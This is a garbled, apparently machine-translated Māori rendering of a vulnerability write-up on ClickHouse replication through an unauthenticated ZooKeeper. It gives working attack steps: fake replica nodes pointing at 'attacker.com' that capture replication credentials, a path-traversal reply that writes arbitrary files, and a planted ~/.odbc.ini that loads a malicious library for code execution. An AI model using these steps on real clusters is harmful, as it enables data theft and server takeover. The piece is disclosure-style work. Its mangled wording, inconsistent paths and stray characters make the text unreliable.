He aha koe me kati nga whare kararehe kararehe?

Ko tenei tuhinga ka korero i te korero mo tetahi whakaraeraetanga tino motuhake i roto i te kawa tukurua ClickHouse, me te whakaatu ano me pehea te whakawhānui ake o te mata whakaeke.

Ko te ClickHouse he papaa raraunga mo te penapena i nga pukapuka nui o nga raraunga, i te nuinga o te waa e whakamahi ana i nga tauira neke atu i te kotahi. Ko te kohinga me te tukurua i ClickHouse ka hangaia ki runga Apache ZooKeeper (ZK) me te tono motika tuhi.

Ko te whakaurunga ZK taunoa karekau e hiahia motuhēhēnga, no reira e hia mano nga tūmau ZK i whakamahia ki te whirihora i a Kafka, Hadoop, ClickHouse kei te waatea noa.

Hei whakaiti i to mata whakaeke, me whirihora e koe te motuhēhēnga me te whakamanatanga i te wa e whakauru ana i te ZooKeeper

Ko etahi o nga ra 0 te whakamaaramatanga Java, engari ka whakaaro ka taea e te kaiwhaiwhai te panui me te tuhi ki a ZooKeeper, whakamahia mo te tukurua ClickHouse.

Ina whirihorahia i roto i te aratau tautau, ka tautoko a ClickHouse i nga patai kua tohatohahia DDL, ka haere i roto i te ZK - mo ratou ka hangaia nga pona ki te rau /clickhouse/task_queue/ddl.

Hei tauira, ka hangaia e koe he node /clickhouse/task_queue/ddl/query-0001 me te ihirangi:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

a muri i tera, ka mukua te teepu whakamatautau i runga i nga kaiwhakarato tautau host1 me host2. Ka tautoko hoki a DDL i te whakahaere i nga patai CREATE/ALTER/DROP.

He tangi whakamataku? Engari kei hea e taea ai e te kaiwhaiwhai te tiki wahitau tūmau?

ClickHouse tukurua ka mahi i te taumata o nga ripanga takitahi, na ka hangaia he teepu ki te ZK, ka tohua he tūmau hei kawenga mo te whakawhiti metadata me nga tauira. Hei tauira, ina mahia he tono (me whirihorahia te ZK, chXX - ingoa o te tauira, poupou - ingoa ripanga):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

ka hangaia nga pona tīwae и raraungameta.

Ihirangi /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Ka taea te hanumi raraunga mai i tenei kahui? Ae, mena ko te tauranga tukurua (TCP/9009) i runga i te tūmau chXX-address e kore e katia te papangaahi, e kore hoki e whirihorahia te motuhēhēnga mo te tāruarua. Me pehea te karo i te motuhēhēnga?

Ka taea e te kaiwhaiwhai te hanga tauira hou ki te ZK ma te kape noa i nga ihirangi mai /clickhouse/tables/01-01/foobar/replicas/chXX me te huri i te tikanga host.

Ihirangi /clickhouse/tables/01–01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Na ka hiahia koe ki te korero ki etahi atu tauira he poraka hou o nga raraunga kei runga i te tūmau a te kaitukino me tango e ratou - ka hangaia he node ki te ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX karekau e tipu ana, me nui ake i te mea whakamutunga i roto i te raarangi takahanga):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

te wahi puna_whakarite - te ingoa o te tauira a te kaitukino i hangaia i te taahiraa o mua, poraka_id - tohu tohu poraka raraunga, whiwhi - "whiwhi poraka" whakahau (me Anei nga whakahau mo etahi atu mahi).

I muri mai, ka panuihia e ia tauira tetahi huihuinga hou i roto i te raarangi ka haere ki tetahi tūmau e whakahaerehia ana e te kaipatu kia whiwhi poraka raraunga (he rua te kawa tukurua, kei runga ake o HTTP). Tūmau attacker.com ka whiwhi tono:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

ko XXX te raraunga motuhēhēnga mō te tāruarua. I etahi wa, he putea pea tenei e uru ana ki te paataka ma te kawa ClickHouse matua me te kawa HTTP. Kua kite koe, ka tino nui te mata whakaeke na te mea ko ZooKeeper, i whakamahia mo te tukurua, i waihohia kaore he whakamotuhēhēnga i whirihorahia.

Kia titiro tatou ki te mahi o te tango poraka raraunga mai i te tauira, kua tuhia me te tino maia kei raro i te mana whakahaere nga tauira katoa me te whakawhirinaki kei waenganui i a raatau.

waehere tukatuka tukurua

Ka panuihia e te mahi he rarangi o nga konae, katahi ko o raatau ingoa, rahi, ihirangi, katahi ka tuhia ki te punaha konae. He mea tika ki te whakaahua motuhake me pehea te penapena raraunga ki te punaha konae.

He maha nga raarangiroto kei roto /var/lib/clickhouse (whaiaronga rokiroki taunoa mai i te konae whirihoranga):

haki - whaiaronga mo te tuhi haki, whakamahia i roto i te whakaora i muri i te ngaronga raraunga;
tmp — whaiaronga mo te penapena i nga konae rangitahi;
kaiwhakamahi_kōnae — Ko nga mahi me nga konae kei roto i nga tono he iti ki tenei raarangi (INTO OUTFILE me etahi atu);
raraungameta - nga konae sql me nga whakaahuatanga ripanga;
preprocessed_configs - i tukatukahia nga konae whirihoranga pärönaki mai /etc/clickhouse-server;
raraunga - ko te whaiaronga me nga raraunga ake, i tenei keehi mo ia papaunga raraunga ka hangaia he raarangi motuhake ki konei (hei tauira /var/lib/clickhouse/data/default).

Mo ia ripanga, ka hangaia he raarangiroto i roto i te raarangi raraunga. Ko ia tīwae he kōnae motuhake kei runga hōputu pūkaha. Hei tauira mo te tepu poupoui hangaia e te kaitukino, ka hangaia nga konae e whai ake nei:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

Ko te tauira ka whiwhi i nga konae he rite nga ingoa i te wa e tukatuka ana i te poraka o nga raraunga kaore e whakamanahia i tetahi huarahi.

Kua rongo kē pea te kaipanui whakarongo mo te whakakotahitanga kino o te ingoa_kōnae i roto i tētahi mahi WriteBufferFromFile. Ae, ma tenei ka taea e te kaitawhai te tuhi i nga ihirangi noa ki tetahi konae kei runga i te FS me nga mana kaiwhakamahi clickhouse. Hei mahi i tenei, me whakahoki te tauira e whakahaeretia ana e te kaitukino i te whakautu e whai ake nei ki te tono (kua taapirihia nga wehenga raina kia maamaa te maarama):

x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeper

a i muri i te whakakotahitanga ../../../../../../../../../tmp/pwned ka tuhia te kōnae /tmp/pwned me te ihirangi hellofromzookeeper.

He maha nga whiringa mo te huri i te kaha tuhi konae ki te mahi waehere mamao (RCE).

Papakupu o waho i RCE

I nga putanga tawhito, ko te whaiaronga me nga tautuhinga ClickHouse i rongoa me nga mana kaiwhakamahi whare clickhouse taunoa. Ko nga konae Tautuhinga he konae XML ka panuihia e te ratonga i te tiimatanga ka keteroki ki roto /var/lib/clickhouse/preprocessed_configs. Ka puta nga huringa, ka panuitia ano. Mena kei a koe te uru ki /etc/clickhouse-server ka taea e te tangata whakaeke te hanga i tana ake papakupu waho momo whakahaere katahi ka mahia te waehere tuku noa. Ko nga putanga o naianei o ClickHouse kaore e whakarato motika ma te taunoa, engari ki te whakahōuhia te tūmau, ka noho tonu aua mana. Mena kei te tautoko koe i te roopu ClickHouse, tirohia nga motika ki te raarangi tautuhinga, me uru ki te kaiwhakamahi root.

ODBC ki RCE

I te wa e whakauru ana i tetahi kete, ka hangaia he kaiwhakamahi clickhouse, engari kaore i hangaia tana raarangi kaainga /nonexistent. Heoi, ina whakamahi papakupu o waho, mo etahi atu take ranei, ka hangaia e nga kaiwhakahaere he whaiaronga /nonexistent ka hoatu ki te kaiwhakamahi clickhouse uru ki te tuhi ki a ia (SSZB! āhua. kaiwhakamaori).

Ka tautoko a ClickHouse ODBC a ka taea te hono atu ki etahi atu putunga raraunga. I roto i te ODBC, ka taea e koe te tohu i te ara ki te whare pukapuka atekōkiri pātengi raraunga (.so). Ko nga putanga tawhito o ClickHouse i taea e koe te mahi tika i tenei i roto i te kaihautu tono, engari inaianei kua taapirihia he tirotiro tino kaha mo te aho hononga ki odbc-bridge, no reira kua kore e taea te tautuhi i te ara taraiwa mai i te tono. Engari ka taea e te kaiwhaiwhai te tuhi ki te raarangi kaainga ma te whakamahi i te whakaraeraetanga kua whakaahuatia i runga ake nei?

Me hanga he konae ~/.odbc.ini me nga ihirangi penei:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

katahi ka tiimata SELECT * FROM odbc('DSN=lalala', 'test', 'test'); ka utaina te whare pukapuka test.so ka whiwhi RCE (whakawhetai buglloc mo te pito).

Ko enei me etahi atu whakaraerae kua whakatikahia ki te putanga ClickHouse 19.14.3. Kia mau ki to ClickHouse me nga ZooKeepers!

Source: will.com